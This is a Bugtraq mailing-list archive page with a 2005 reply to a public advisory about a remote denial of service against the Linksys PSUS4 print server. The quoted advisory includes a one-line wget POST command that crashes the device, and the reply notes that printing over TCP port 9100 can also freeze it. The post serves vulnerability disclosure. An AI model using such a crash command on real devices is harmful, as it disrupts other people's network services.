[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Re: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
From: Denis Jedig <seclists@xxxxxxxxxxxx>
Date: Fri, 04 Feb 2005 02:20:40 +0100

laurent oudot wrote:

Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

Here is an example, to crash a remote PSUS4 :

$ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
[...]
=> And the PSUS4 is crashed.

Well, if you want a more complicated way, just try to print a page through the SMP (tcp/9100) - it will occasionally freeze the print server as well.

The firmware seems not to be very mature, I'd bet that we could expect more serious vulnerabilities from it.

Denis

References:
- [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
  - From: laurent oudot

Prev by Date: [SECURITY] [DSA 667-1] New PostgreSQL packages fix arbitrary library loading
Next by Date: Re: Squirrelmail vacation v0.15 local root exploit
Previous by thread: [ RSTACK Public Security Advisory ] Remote DOS against Linksys PSUS4
Next by thread: Wireless networks/Default Admin username security problem in Croatia
Index(es):
- Date
- Thread